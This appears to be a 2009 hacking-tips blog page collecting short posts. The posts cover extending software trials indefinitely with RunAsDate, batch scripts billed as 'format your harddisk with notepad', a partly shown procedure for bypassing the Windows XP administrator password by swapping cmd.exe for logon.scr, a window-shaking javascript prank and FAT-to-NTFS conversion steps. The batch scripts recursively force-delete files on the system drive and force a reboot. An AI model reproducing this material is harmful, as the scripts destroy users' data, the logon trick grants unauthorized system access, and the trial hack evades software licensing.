Thursday, December 31, 2009

make trial period forever of trial softwere

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

 For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.

I hope this helps! Please express your experience and opinions through comments.

FORMAT UR HARDDISK WITH NOTEPAD

FORMAT UR HARDDISK WITH NOTEPAD
Just Go To Notepad and then type code which is given below..
*******************************
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
*********************************

Hack windows xp passwords



Hack windows xp passwordsHere are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. [...]







Funny Computer trick

Copy and paste the java script code to the address bar of your browser


javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)


Convert FAT-NTFS

To convert FAT partition into a NTFS, Perform the following Steps..
Click Start, click program and then click command prompt.In windows XP, click start, click run
type cmd and then click OK.

At the command promt, type CONVERT[drive_letter]:  /FS:NTFS.convert.exe will to convert
the partition to NTFS.